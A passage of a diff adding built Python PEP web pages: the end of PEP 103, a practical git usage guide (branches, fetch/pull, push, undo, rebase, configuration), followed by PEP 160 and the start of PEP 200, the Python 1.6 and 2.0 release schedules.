+

Documentation

+

Git is accompanied with a lot of documentation, both online and +offline.

+
+

Documentation for starters

+

Git Tutorial: part 1, +part 2.

+

Git User’s manual. +Everyday GIT With 20 Commands Or So. +Git workflows.

+
+
+

Advanced documentation

+

Git Magic, +with a number of translations.

+

Pro Git. The Book about git. Buy it at +Amazon or download in PDF, mobi, or ePub form. It has translations to +many different languages. Download Russian translation from GArik.

+

Git Wiki.

+

Git Buch (German).

+
+
+

Offline documentation

+

Git has builtin help: run git help $TOPIC. For example, run +git help git or git help help.

+
+
+
+

Quick start

+
+

Download and installation

+

Unix users: download and install using your package manager.

+

Microsoft Windows: download git-for-windows.

+

MacOS X: use git installed with XCode or download from MacPorts or +git-osx-installer or +install git with Homebrew: brew install git.

+

git-cola (repository) is a Git GUI written in +Python and GPL licensed. Linux, Windows, MacOS X.

+

TortoiseGit is a Windows Shell Interface +to Git based on TortoiseSVN; open source.

+
+
+

Initial configuration

+

This simple code is often appears in documentation, but it is +important so let repeat it here. Git stores author and committer +names/emails in every commit, so configure your real name and +preferred email:

+
$ git config --global user.name "User Name"
+$ git config --global user.email user.name@example.org
+
+
+
+
+
+

Examples in this PEP

+

Examples of git commands in this PEP use the following approach. It is +supposed that you, the user, works with a local repository named +python that has an upstream remote repo named origin. Your +local repo has two branches v1 and master. For most examples +the currently checked out branch is master. That is, it’s assumed +you have done something like that:

+
$ git clone https://git.python.org/python.git
+$ cd python
+$ git branch v1 origin/v1
+
+
+

The first command clones remote repository into local directory +python, creates a new local branch master, sets +remotes/origin/master as its upstream remote-tracking branch and +checks it out into the working directory.

+

The last command creates a new local branch v1 and sets +remotes/origin/v1 as its upstream remote-tracking branch.

+

The same result can be achieved with commands:

+
$ git clone -b v1 https://git.python.org/python.git
+$ cd python
+$ git checkout --track origin/master
+
+
+

The last command creates a new local branch master, sets +remotes/origin/master as its upstream remote-tracking branch and +checks it out into the working directory.

+
+
+

Branches and branches

+

Git terminology can be a bit misleading. Take, for example, the term +“branch”. In git it has two meanings. A branch is a directed line of +commits (possibly with merges). And a branch is a label or a pointer +assigned to a line of commits. It is important to distinguish when you +talk about commits and when about their labels. Lines of commits are +by itself unnamed and are usually only lengthening and merging. +Labels, on the other hand, can be created, moved, renamed and deleted +freely.

+
+
+

Remote repositories and remote branches

+

Remote-tracking branches are branches (pointers to commits) in your +local repository. They are there for git (and for you) to remember +what branches and commits have been pulled from and pushed to what +remote repos (you can pull from and push to many remotes). +Remote-tracking branches live under remotes/$REMOTE namespaces, +e.g. remotes/origin/master.

+

To see the status of remote-tracking branches run:

+
$ git branch -rv
+
+
+

To see local and remote-tracking branches (and tags) pointing to +commits:

+
$ git log --decorate
+
+
+

You never do your own development on remote-tracking branches. You +create a local branch that has a remote branch as upstream and do +development on that local branch. On push git pushes commits to the +remote repo and updates remote-tracking branches, on pull git fetches +commits from the remote repo, updates remote-tracking branches and +fast-forwards, merges or rebases local branches.

+

When you do an initial clone like this:

+
$ git clone -b v1 https://git.python.org/python.git
+
+
+

git clones remote repository https://git.python.org/python.git to +directory python, creates a remote named origin, creates +remote-tracking branches, creates a local branch v1, configure it +to track upstream remotes/origin/v1 branch and checks out v1 into +the working directory.

+

Some commands, like git status --branch and git branch --verbose, +report the difference between local and remote branches. +Please remember they only do comparison with remote-tracking branches +in your local repository, and the state of those remote-tracking +branches can be outdated. To update remote-tracking branches you +either fetch and merge (or rebase) commits from the remote repository +or update remote-tracking branches without updating local branches.

+
+

Updating local and remote-tracking branches

+

To update remote-tracking branches without updating local branches run +git remote update [$REMOTE...]. For example:

+
$ git remote update
+$ git remote update origin
+
+
+
+

Fetch and pull

+

There is a major difference between

+
$ git fetch $REMOTE $BRANCH
+
+
+

and

+
$ git fetch $REMOTE $BRANCH:$BRANCH
+
+
+

The first command fetches commits from the named $BRANCH in the +$REMOTE repository that are not in your repository, updates +remote-tracking branch and leaves the id (the hash) of the head commit +in file .git/FETCH_HEAD.

+

The second command fetches commits from the named $BRANCH in the +$REMOTE repository that are not in your repository and updates both +the local branch $BRANCH and its upstream remote-tracking branch. But +it refuses to update branches in case of non-fast-forward. And it +refuses to update the current branch (currently checked out branch, +where HEAD is pointing to).

+

The first command is used internally by git pull.

+
$ git pull $REMOTE $BRANCH
+
+
+

is equivalent to

+
$ git fetch $REMOTE $BRANCH
+$ git merge FETCH_HEAD
+
+
+

Certainly, $BRANCH in that case should be your current branch. If you +want to merge a different branch into your current branch first update +that non-current branch and then merge:

+
$ git fetch origin v1:v1  # Update v1
+$ git pull --rebase origin master  # Update the current branch master
+                                   # using rebase instead of merge
+$ git merge v1
+
+
+

If you have not yet pushed commits on v1, though, the scenario has +to become a bit more complex. Git refuses to update +non-fast-forwardable branch, and you don’t want to do force-pull +because that would remove your non-pushed commits and you would need +to recover. So you want to rebase v1 but you cannot rebase +non-current branch. Hence, checkout v1 and rebase it before +merging:

+
$ git checkout v1
+$ git pull --rebase origin v1
+$ git checkout master
+$ git pull --rebase origin master
+$ git merge v1
+
+
+

It is possible to configure git to make it fetch/pull a few branches +or all branches at once, so you can simply run

+
$ git pull origin
+
+
+

or even

+
$ git pull
+
+
+

Default remote repository for fetching/pulling is origin. Default +set of references to fetch is calculated using matching algorithm: git +fetches all branches having the same name on both ends.

+
+
+

Push

+

Pushing is a bit simpler. There is only one command push. When you +run

+
$ git push origin v1 master
+
+
+

git pushes local v1 to remote v1 and local master to remote master. +The same as:

+
$ git push origin v1:v1 master:master
+
+
+

Git pushes commits to the remote repo and updates remote-tracking +branches. Git refuses to push commits that aren’t fast-forwardable. +You can force-push anyway, but please remember - you can force-push to +your own repositories but don’t force-push to public or shared repos. +If you find git refuses to push commits that aren’t fast-forwardable, +better fetch and merge commits from the remote repo (or rebase your +commits on top of the fetched commits), then push. Only force-push if +you know what you do and why you do it. See the section Commit +editing and caveats below.

+

It is possible to configure git to make it push a few branches or all +branches at once, so you can simply run

+
$ git push origin
+
+
+

or even

+
$ git push
+
+
+

Default remote repository for pushing is origin. Default set of +references to push in git before 2.0 is calculated using matching +algorithm: git pushes all branches having the same name on both ends. +Default set of references to push in git 2.0+ is calculated using +simple algorithm: git pushes the current branch back to its +@{upstream}.

+

To configure git before 2.0 to the new behaviour run:

+
$ git config push.default simple
+
+
+

To configure git 2.0+ to the old behaviour run:

+
$ git config push.default matching
+
+
+

Git doesn’t allow to push a branch if it’s the current branch in the +remote non-bare repository: git refuses to update remote working +directory. You really should push only to bare repositories. For +non-bare repositories git prefers pull-based workflow.

+

When you want to deploy code on a remote host and can only use push +(because your workstation is behind a firewall and you cannot pull +from it) you do that in two steps using two repositories: you push +from the workstation to a bare repo on the remote host, ssh to the +remote host and pull from the bare repo to a non-bare deployment repo.

+

That changed in git 2.3, but see the blog post +for caveats; in 2.4 the push-to-deploy feature was further improved.

+
+
+

Tags

+

Git automatically fetches tags that point to commits being fetched +during fetch/pull. To fetch all tags (and commits they point to) run +git fetch --tags origin. To fetch some specific tags fetch them +explicitly:

+
$ git fetch origin tag $TAG1 tag $TAG2...
+
+
+

For example:

+
$ git fetch origin tag 1.4.2
+$ git fetch origin v1:v1 tag 2.1.7
+
+
+

Git doesn’t automatically pushes tags. That allows you to have private +tags. To push tags list them explicitly:

+
$ git push origin tag 1.4.2
+$ git push origin v1 master tag 2.1.7
+
+
+

Or push all tags at once:

+
$ git push --tags origin
+
+
+

Don’t move tags with git tag -f or remove tags with git tag -d +after they have been published.

+
+
+

Private information

+

When cloning/fetching/pulling/pushing git copies only database objects +(commits, trees, files and tags) and symbolic references (branches and +lightweight tags). Everything else is private to the repository and +never cloned, updated or pushed. It’s your config, your hooks, your +private exclude file.

+

If you want to distribute hooks, copy them to the working tree, add, +commit, push and instruct the team to update and install the hooks +manually.

+
+
+
+
+

Commit editing and caveats

+

A warning not to edit published (pushed) commits also appears in +documentation but it’s repeated here anyway as it’s very important.

+

It is possible to recover from a forced push but it’s PITA for the +entire team. Please avoid it.

+

To see what commits have not been published yet compare the head of the +branch with its upstream remote-tracking branch:

+
$ git log origin/master..  # from origin/master to HEAD (of master)
+$ git log origin/v1..v1  # from origin/v1 to the head of v1
+
+
+

For every branch that has an upstream remote-tracking branch git +maintains an alias @{upstream} (short version @{u}), so the commands +above can be given as:

+
$ git log @{u}..
+$ git log v1@{u}..v1
+
+
+

To see the status of all branches:

+
$ git branch -avv
+
+
+

To compare the status of local branches with a remote repo:

+
$ git remote show origin
+
+
+

Read how to recover from upstream rebase. +It is in git help rebase.

+

On the other hand, don’t be too afraid about commit editing. You can +safely edit, reorder, remove, combine and split commits that haven’t +been pushed yet. You can even push commits to your own (backup) repo, +edit them later and force-push edited commits to replace what have +already been pushed. Not a problem until commits are in a public +or shared repository.

+
+
+

Undo

+

Whatever you do, don’t panic. Almost anything in git can be undone.

+
+

git checkout: restore file’s content

+

git checkout, for example, can be used to restore the content of +file(s) to that one of a commit. Like this:

+
git checkout HEAD~ README
+
+
+

The commands restores the contents of README file to the last but one +commit in the current branch. By default the commit ID is simply HEAD; +i.e. git checkout README restores README to the latest commit.

+

(Do not use git checkout to view a content of a file in a commit, +use git cat-file -p; e.g. git cat-file -p HEAD~:path/to/README).

+
+
+

git reset: remove (non-pushed) commits

+

git reset moves the head of the current branch. The head can be +moved to point to any commit but it’s often used to remove a commit or +a few (preferably, non-pushed ones) from the top of the branch - that +is, to move the branch backward in order to undo a few (non-pushed) +commits.

+

git reset has three modes of operation - soft, hard and mixed. +Default is mixed. ProGit explains the +difference very clearly. Bare repositories don’t have indices or +working trees so in a bare repo only soft reset is possible.

+
+

Unstaging

+

Mixed mode reset with a path or paths can be used to unstage changes - +that is, to remove from index changes added with git add for +committing. See The Book for details +about unstaging and other undo tricks.

+
+
+
+

git reflog: reference log

+

Removing commits with git reset or moving the head of a branch +sounds dangerous and it is. But there is a way to undo: another +reset back to the original commit. Git doesn’t remove commits +immediately; unreferenced commits (in git terminology they are called +“dangling commits”) stay in the database for some time (default is two +weeks) so you can reset back to it or create a new branch pointing to +the original commit.

+

For every move of a branch’s head - with git commit, git +checkout, git fetch, git pull, git rebase, git reset +and so on - git stores a reference log (reflog for short). For every +move git stores where the head was. Command git reflog can be used +to view (and manipulate) the log.

+

In addition to the moves of the head of every branch git stores the +moves of the HEAD - a symbolic reference that (usually) names the +current branch. HEAD is changed with git checkout $BRANCH.

+

By default git reflog shows the moves of the HEAD, i.e. the +command is equivalent to git reflog HEAD. To show the moves of the +head of a branch use the command git reflog $BRANCH.

+

So to undo a git reset lookup the original commit in git +reflog, verify it with git show or git log and run git +reset $COMMIT_ID. Git stores the move of the branch’s head in +reflog, so you can undo that undo later again.

+

In a more complex situation you’d want to move some commits along with +resetting the head of the branch. Cherry-pick them to the new branch. +For example, if you want to reset the branch master back to the +original commit but preserve two commits created in the current branch +do something like:

+
$ git branch save-master  # create a new branch saving master
+$ git reflog  # find the original place of master
+$ git reset $COMMIT_ID
+$ git cherry-pick save-master~ save-master
+$ git branch -D save-master  # remove temporary branch
+
+
+
+
+

git revert: revert a commit

+

git revert reverts a commit or commits, that is, it creates a new +commit or commits that revert(s) the effects of the given commits. +It’s the only way to undo published commits (git commit --amend, +git rebase and git reset change the branch in +non-fast-forwardable ways so they should only be used for non-pushed +commits.)

+

There is a problem with reverting a merge commit. git revert can +undo the code created by the merge commit but it cannot undo the fact +of merge. See the discussion How to revert a faulty merge.

+
+
+

One thing that cannot be undone

+

Whatever you undo, there is one thing that cannot be undone - +overwritten uncommitted changes. Uncommitted changes don’t belong to +git so git cannot help preserving them.

+

Most of the time git warns you when you’re going to execute a command +that overwrites uncommitted changes. Git doesn’t allow you to switch +branches with git checkout. It stops you when you’re going to +rebase with non-clean working tree. It refuses to pull new commits +over non-committed files.

+

But there are commands that do exactly that - overwrite files in the +working tree. Commands like git checkout $PATHs or git reset +--hard silently overwrite files including your uncommitted changes.

+

With that in mind you can understand the stance “commit early, commit +often”. Commit as often as possible. Commit on every save in your +editor or IDE. You can edit your commits before pushing - edit commit +messages, change commits, reorder, combine, split, remove. But save +your changes in git database, either commit changes or at least stash +them with git stash.

+
+
+
+

Merge or rebase?

+

Internet is full of heated discussions on the topic: “merge or +rebase?” Most of them are meaningless. When a DVCS is being used in a +big team with a big and complex project with many branches there is +simply no way to avoid merges. So the question’s diminished to +“whether to use rebase, and if yes - when to use rebase?” Considering +that it is very much recommended not to rebase published commits the +question’s diminished even further: “whether to use rebase on +non-pushed commits?”

+

That small question is for the team to decide. To preserve the beauty +of linear history it’s recommended to use rebase when pulling, i.e. do +git pull --rebase or even configure automatic setup of rebase for +every new branch:

+
$ git config branch.autosetuprebase always
+
+
+

and configure rebase for existing branches:

+
$ git config branch.$NAME.rebase true
+
+
+

For example:

+
$ git config branch.v1.rebase true
+$ git config branch.master.rebase true
+
+
+

After that git pull origin master becomes equivalent to git pull +--rebase origin master.

+

It is recommended to create new commits in a separate feature or topic +branch while using rebase to update the mainline branch. When the +topic branch is ready merge it into mainline. To avoid a tedious task +of resolving large number of conflicts at once you can merge the topic +branch to the mainline from time to time and switch back to the topic +branch to continue working on it. The entire workflow would be +something like:

+
$ git checkout -b issue-42  # create a new issue branch and switch to it
+    ...edit/test/commit...
+$ git checkout master
+$ git pull --rebase origin master  # update master from the upstream
+$ git merge issue-42
+$ git branch -d issue-42  # delete the topic branch
+$ git push origin master
+
+
+

When the topic branch is deleted only the label is removed, commits +are stayed in the database, they are now merged into master:

+
o--o--o--o--o--M--< master - the mainline branch
+    \         /
+     --*--*--*             - the topic branch, now unnamed
+
+
+

The topic branch is deleted to avoid cluttering branch namespace with +small topic branches. Information on what issue was fixed or what +feature was implemented should be in the commit messages.

+

But even that small amount of rebasing could be too big in case of +long-lived merged branches. Imagine you’re doing work in both v1 +and master branches, regularly merging v1 into master. +After some time you will have a lot of merge and non-merge commits in +master. Then you want to push your finished work to a shared +repository and find someone has pushed a few commits to v1. Now +you have a choice of two equally bad alternatives: either you fetch +and rebase v1 and then have to recreate all you work in master +(reset master to the origin, merge v1 and cherry-pick all +non-merge commits from the old master); or merge the new v1 and +loose the beauty of linear history.

+
+
+

Null-merges

+

Git has a builtin merge strategy for what Python core developers call +“null-merge”:

+
$ git merge -s ours v1  # null-merge v1 into master
+
+
+
+
+

Branching models

+

Git doesn’t assume any particular development model regarding +branching and merging. Some projects prefer to graduate patches from +the oldest branch to the newest, some prefer to cherry-pick commits +backwards, some use squashing (combining a number of commits into +one). Anything is possible.

+

There are a few examples to start with. git help workflows +describes how the very git authors develop git.

+

ProGit book has a few chapters devoted to branch management in +different projects: Git Branching - Branching Workflows and +Distributed Git - Contributing to a Project.

+

There is also a well-known article A successful Git branching model by Vincent +Driessen. It recommends a set of very detailed rules on creating and +managing mainline, topic and bugfix branches. To support the model the +author implemented git flow +extension.

+
+
+

Advanced configuration

+
+

Line endings

+

Git has builtin mechanisms to handle line endings between platforms +with different end-of-line styles. To allow git to do CRLF conversion +assign text attribute to files using .gitattributes. +For files that have to have specific line endings assign eol +attribute. For binary files the attribute is, naturally, binary.

+

For example:

+
$ cat .gitattributes
+*.py text
+*.txt text
+*.png binary
+/readme.txt eol=CRLF
+
+
+

To check what attributes git uses for files use git check-attr +command. For example:

+
$ git check-attr -a -- \*.py
+
+
+
+
+

Useful assets

+

GitAlias (repository) is a big collection of +aliases. A careful selection of aliases for frequently used commands +could save you a lot of keystrokes!

+

GitIgnore and +https://github.com/github/gitignore are collections of .gitignore +files for all kinds of IDEs and programming languages. Python +included!

+

pre-commit (repositories) is a framework for managing and +maintaining multi-language pre-commit hooks. The framework is written +in Python and has a lot of plugins for many programming languages.

+
+
+
+

Advanced topics

+
+

Staging area

+

Staging area aka index aka cache is a distinguishing feature of git. +Staging area is where git collects patches before committing them. +Separation between collecting patches and commit phases provides a +very useful feature of git: you can review collected patches before +commit and even edit them - remove some hunks, add new hunks and +review again.

+

To add files to the index use git add. Collecting patches before +committing means you need to do that for every change, not only to add +new (untracked) files. To simplify committing in case you just want to +commit everything without reviewing run git commit --all (or just +-a) - the command adds every changed tracked file to the index and +then commit. To commit a file or files regardless of patches collected +in the index run git commit [--only|-o] -- $FILE....

+

To add hunks of patches to the index use git add --patch (or just +-p). To remove collected files from the index use git reset HEAD +-- $FILE... To add/inspect/remove collected hunks use git add +--interactive (-i).

+

To see the diff between the index and the last commit (i.e., collected +patches) use git diff --cached. To see the diff between the +working tree and the index (i.e., uncollected patches) use just git +diff. To see the diff between the working tree and the last commit +(i.e., both collected and uncollected patches) run git diff HEAD.

+

See WhatIsTheIndex and +IndexCommandQuickref in Git +Wiki.

+
+
+

Root

+

Git switches to the root (top-level directory of the project where +.git subdirectory exists) before running any command. Git +remembers though the directory that was current before the switch. +Some programs take into account the current directory. E.g., git +status shows file paths of changed and unknown files relative to the +current directory; git grep searches below the current directory; +git apply applies only those hunks from the patch that touch files +below the current directory.

+

But most commands run from the root and ignore the current directory. +Imagine, for example, that you have two work trees, one for the branch +v1 and the other for master. If you want to merge v1 from +a subdirectory inside the second work tree you must write commands as +if you’re in the top-level dir. Let take two work trees, +project-v1 and project, for example:

+
$ cd project/subdirectory
+$ git fetch ../project-v1 v1:v1
+$ git merge v1
+
+
+

Please note the path in git fetch ../project-v1 v1:v1 is +../project-v1 and not ../../project-v1 despite the fact that +we run the commands from a subdirectory, not from the root.

+
+
+

ReReRe

+

Rerere is a mechanism that helps to resolve repeated merge conflicts. +The most frequent source of recurring merge conflicts are topic +branches that are merged into mainline and then the merge commits are +removed; that’s often performed to test the topic branches and train +rerere; merge commits are removed to have clean linear history and +finish the topic branch with only one last merge commit.

+

Rerere works by remembering the states of tree before and after a +successful commit. That way rerere can automatically resolve conflicts +if they appear in the same files.

+

Rerere can be used manually with git rerere command but most often +it’s used automatically. Enable rerere with these commands in a +working tree:

+
$ git config rerere.enabled true
+$ git config rerere.autoupdate true
+
+
+

You don’t need to turn rerere on globally - you don’t want rerere in +bare repositories or single-branch repositories; you only need rerere +in repos where you often perform merges and resolve merge conflicts.

+

See Rerere in The +Book.

+
+
+

Database maintenance

+

Git object database and other files/directories under .git require +periodic maintenance and cleanup. For example, commit editing left +unreferenced objects (dangling objects, in git terminology) and these +objects should be pruned to avoid collecting cruft in the DB. The +command git gc is used for maintenance. Git automatically runs +git gc --auto as a part of some commands to do quick maintenance. +Users are recommended to run git gc --aggressive from time to +time; git help gc recommends to run it every few hundred +changesets; for more intensive projects it should be something like +once a week and less frequently (biweekly or monthly) for lesser +active projects.

+

git gc --aggressive not only removes dangling objects, it also +repacks object database into indexed and better optimized pack(s); it +also packs symbolic references (branches and tags). Another way to do +it is to run git repack.

+

There is a well-known message from Linus +Torvalds regarding “stupidity” of git gc --aggressive. The message +can safely be ignored now. It is old and outdated, git gc +--aggressive became much better since that time.

+

For those who still prefer git repack over git gc --aggressive +the recommended parameters are git repack -a -d -f --depth=20 +--window=250. See this detailed experiment +for explanation of the effects of these parameters.

+

From time to time run git fsck [--strict] to verify integrity of +the database. git fsck may produce a list of dangling objects; +that’s not an error, just a reminder to perform regular maintenance.

+
+
+
+

Tips and tricks

+
+

Command-line options and arguments

+

git help cli +recommends not to combine short options/flags. Most of the times +combining works: git commit -av works perfectly, but there are +situations when it doesn’t. E.g., git log -p -5 cannot be combined +as git log -p5.

+

Some options have arguments, some even have default arguments. In that +case the argument for such option must be spelled in a sticky way: +-Oarg, never -O arg because for an option that has a default +argument the latter means “use default value for option -O and +pass arg further to the option parser”. For example, git grep +has an option -O that passes a list of names of the found files to +a program; default program for -O is a pager (usually less), +but you can use your editor:

+
$ git grep -Ovim  # but not -O vim
+
+
+

BTW, if git is instructed to use less as the pager (i.e., if pager +is not configured in git at all it uses less by default, or if it +gets less from GIT_PAGER or PAGER environment variables, or if it +was configured with git config [--global] core.pager less, or +less is used in the command git grep -Oless) git grep +passes +/$pattern option to less which is quite convenient. +Unfortunately, git grep doesn’t pass the pattern if the pager is +not exactly less, even if it’s less with parameters (something +like git config [--global] core.pager less -FRSXgimq); fortunately, +git grep -Oless always passes the pattern.

+
+
+

bash/zsh completion

+

It’s a bit hard to type git rebase --interactive --preserve-merges +HEAD~5 manually even for those who are happy to use command-line, +and this is where shell completion is of great help. Bash/zsh come +with programmable completion, often automatically installed and +enabled, so if you have bash/zsh and git installed, chances are you +are already done - just go and use it at the command-line.

+

If you don’t have necessary bits installed, install and enable +bash_completion package. If you want to upgrade your git completion to +the latest and greatest download necessary file from git contrib.

+

Git-for-windows comes with git-bash for which bash completion is +installed and enabled.

+
+
+

bash/zsh prompt

+

For command-line lovers shell prompt can carry a lot of useful +information. To include git information in the prompt use +git-prompt.sh. +Read the detailed instructions in the file.

+

Search the Net for “git prompt” to find other prompt variants.

+
+
+

SSH connection sharing

+

SSH connection sharing is a feature of OpenSSH and perhaps derivatives +like PuTTY. SSH connection sharing is a way to decrease ssh client +startup time by establishing one connection and reusing it for all +subsequent clients connecting to the same server. SSH connection +sharing can be used to speedup a lot of short ssh sessions like scp, +sftp, rsync and of course git over ssh. If you regularly +fetch/pull/push from/to remote repositories accessible over ssh then +using ssh connection sharing is recommended.

+

To turn on ssh connection sharing add something like this to your +~/.ssh/config:

+
Host *
+ControlMaster auto
+ControlPath ~/.ssh/mux-%r@%h:%p
+ControlPersist 600
+
+
+

See OpenSSH wikibook and +search for +more information.

+

SSH connection sharing can be used at GitHub, GitLab and SourceForge +repositories, but please be advised that BitBucket doesn’t allow it +and forcibly closes master connection after a short inactivity period +so you will see errors like this from ssh: “Connection to bitbucket.org +closed by remote host.”

+
+
+
+

git on server

+

The simplest way to publish a repository or a group of repositories is +git daemon. The daemon provides anonymous access, by default it is +read-only. The repositories are accessible by git protocol (git:// +URLs). Write access can be enabled but the protocol lacks any +authentication means, so it should be enabled only within a trusted +LAN. See git help daemon for details.

+

Git over ssh provides authentication and repo-level authorisation as +repositories can be made user- or group-writeable (see parameter +core.sharedRepository in git help config). If that’s too +permissive or too restrictive for some project’s needs there is a +wrapper gitolite that can +be configured to allow access with great granularity; gitolite is +written in Perl and has a lot of documentation.

+

Web interface to browse repositories can be created using gitweb or cgit. Both are CGI scripts (written in +Perl and C). In addition to web interface both provide read-only dumb +http access for git (http(s):// URLs). Klaus is a small and simple WSGI web +server that implements both web interface and git smart HTTP +transport; supports Python 2 and Python 3, performs syntax +highlighting.

+

There are also more advanced web-based development environments that +include ability to manage users, groups and projects; private, +group-accessible and public repositories; they often include issue +trackers, wiki pages, pull requests and other tools for development +and communication. Among these environments are Kallithea and pagure, +both are written in Python; pagure was written by Fedora developers +and is being used to develop some Fedora projects. GitPrep is yet another GitHub clone, +written in Perl. Gogs is written in Go. +GitBucket is +written in Scala.

+

And last but not least, GitLab. It’s +perhaps the most advanced web-based development environment for git. +Written in Ruby, community edition is free and open source (MIT +license).

+
+
+

From Mercurial to git

+

There are many tools to convert Mercurial repositories to git. The +most famous are, probably, hg-git and +fast-export (many years ago +it was known under the name hg2git).

+

But a better tool, perhaps the best, is git-remote-hg. It provides transparent +bidirectional (pull and push) access to Mercurial repositories from +git. Its author wrote a comparison of alternatives +that seems to be mostly objective.

+

To use git-remote-hg, install or clone it, add to your PATH (or copy +script git-remote-hg to a directory that’s already in PATH) and +prepend hg:: to Mercurial URLs. For example:

+
$ git clone https://github.com/felipec/git-remote-hg.git
+$ PATH=$PATH:"`pwd`"/git-remote-hg
+$ git clone hg::https://hg.python.org/peps/ PEPs
+
+
+

To work with the repository just use regular git commands including +git fetch/pull/push.

+

To start converting your Mercurial habits to git see the page +Mercurial for Git users at Mercurial wiki. +At the second half of the page there is a table that lists +corresponding Mercurial and git commands. Should work perfectly in +both directions.

+

Python Developer’s Guide also has a chapter Mercurial for git +developers that +documents a few differences between git and hg.

+
+
+

Git and GitHub

+

gitsome - Git/GitHub +command line interface (CLI). Written in Python, work on MacOS, Unix, +Windows. Git/GitHub CLI with autocomplete, includes many GitHub +integrated commands that work with all shells, builtin xonsh with +Python REPL to run Python commands alongside shell commands, command +history, customizable highlighting, thoroughly documented.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0103.rst

+

Last modified: 2024-04-14 20:08:31 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0160/index.html b/pep-0160/index.html new file mode 100644 index 00000000000..16a22eb1928 --- /dev/null +++ b/pep-0160/index.html @@ -0,0 +1,186 @@ + + + + + + + + PEP 160 – Python 1.6 Release Schedule | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 160 – Python 1.6 Release Schedule

+
+
Author:
+
Fred L. Drake, Jr. <fred at fdrake.net>
+
Status:
+
Final
+
Type:
+
Informational
+
Topic:
+
Release
+
Created:
+
25-Jul-2000
+
Python-Version:
+
1.6
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Introduction

+

This PEP describes the Python 1.6 release schedule. The CVS +revision history of this file contains the definitive historical +record.

+

This release will be produced by BeOpen PythonLabs staff for the +Corporation for National Research Initiatives (CNRI).

+
+
+

Schedule

+
    +
  • August 1: 1.6 beta 1 release (planned).
  • +
  • August 3: 1.6 beta 1 release (actual).
  • +
  • August 15: 1.6 final release (planned).
  • +
  • September 5: 1.6 final release (actual).
  • +
+
+
+

Features

+

A number of features are required for Python 1.6 in order to +fulfill the various promises that have been made. The following +are required to be fully operational, documented, and forward +compatible with the plans for Python 2.0:

+
    +
  • Unicode support: The Unicode object defined for Python 2.0 must be provided, +including all methods and codec support.
  • +
  • SRE: Fredrik Lundh’s new regular expression engine will be used +to provide support for both 8-bit strings and Unicode strings. It must pass +the regression test used for the pcre-based version of the re module.
  • +
  • The curses module was in the middle of a transformation to a package, so the +final form was adopted.
  • +
+
+
+

Mechanism

+

The release will be created as a branch from the development tree +rooted at CNRI’s close of business on 16 May 2000. Patches +required from more recent checkins will be merged in by moving the +branch tag on individual files whenever possible in order to +reduce mailing list clutter and avoid divergent and incompatible +implementations.

+

The branch tag is “cnri-16-start”.

+

Patches and features will be merged to the extent required to pass +regression tests in effect on 16 May 2000.

+

The beta release is tagged “r16b1” in the CVS repository, and the +final Python 1.6 release is tagged “release16” in the repository.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0160.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0200/index.html b/pep-0200/index.html new file mode 100644 index 00000000000..2f12ded201e --- /dev/null +++ b/pep-0200/index.html @@ -0,0 +1,478 @@ + + + + + + + + PEP 200 – Python 2.0 Release Schedule | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 200 – Python 2.0 Release Schedule

+
+
Author:
+
Jeremy Hylton <jeremy at alum.mit.edu>
+
Status:
+
Final
+
Type:
+
Informational
+
Topic:
+
Release
+
Created:
+
12-Jul-2000
+
Python-Version:
+
2.0
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Introduction

+

This PEP describes the Python 2.0 release schedule, tracking the +status and ownership of the major new features, summarizes discussions +held in mailing list forums, and provides URLs for further +information, patches, and other outstanding issues. The CVS revision +history of this file contains the definitive historical record.

+
+
+

Release Schedule

+

[revised 5 Oct 2000]

+
    +
  • 26-Sep-2000: 2.0 beta 2
  • +
  • 9-Oct-2000: 2.0 release candidate 1 (2.0c1)
  • +
  • 16-Oct-2000: 2.0 final
  • +
+
+
+

Previous milestones

+
    +
  • 14-Aug-2000: All 2.0 PEPs finished / feature freeze
  • +
  • 5-Sep-2000: 2.0 beta 1
  • +
+
+
+

What is release candidate 1?

+

We believe that release candidate 1 will fix all known bugs that we +intend to fix for the 2.0 final release. This release should be a bit +more stable than the previous betas. We would like to see even more +widespread testing before the final release, so we are producing this +release candidate. The final release will be exactly the same unless +any show-stopping (or brown bag) bugs are found by testers of the +release candidate.

+
+
+

Guidelines for submitting patches and making changes

+

Use good sense when committing changes. You should know what we mean +by good sense or we wouldn’t have given you commit privileges <0.5 +wink>. Some specific examples of good sense include:

+
    +
  • Do whatever the dictator tells you.
  • +
  • Discuss any controversial changes on python-dev first. If you get +a lot of +1 votes and no -1 votes, make the change. If you get a +some -1 votes, think twice; consider asking Guido what he thinks.
  • +
  • If the change is to code you contributed, it probably makes sense +for you to fix it.
  • +
  • If the change affects code someone else wrote, it probably makes +sense to ask him or her first.
  • +
  • You can use the SF Patch Manager to submit a patch and assign it to +someone for review.
  • +
+

Any significant new feature must be described in a PEP and approved +before it is checked in.

+

Any significant code addition, such as a new module or large patch, +must include test cases for the regression test and documentation. A +patch should not be checked in until the tests and documentation are +ready.

+

If you fix a bug, you should write a test case that would have caught +the bug.

+

If you commit a patch from the SF Patch Manager or fix a bug from the +Jitterbug database, be sure to reference the patch/bug number in the +CVS log message. Also be sure to change the status in the patch +manager or bug database (if you have access to the bug database).

+

It is not acceptable for any checked in code to cause the regression +test to fail. If a checkin causes a failure, it must be fixed within +24 hours or it will be backed out.

+

All contributed C code must be ANSI C. If possible check it with two +different compilers, e.g. gcc and MSVC.

+

All contributed Python code must follow Guido’s Python style guide. +http://www.python.org/doc/essays/styleguide.html

+

It is understood that any code contributed will be released under an +Open Source license. Do not contribute code if it can’t be released +this way.

+
+
+

Failing test cases need to get fixed

+

We need to resolve errors in the regression test suite quickly. +Changes should not be committed to the CVS tree unless the regression +test runs cleanly with the changes applied. If it fails, there may be +bugs lurking in the code. (There may be bugs anyway, but that’s +another matter.) If the test cases are known to fail, they serve no +useful purpose.

+
test case         platform    date reported
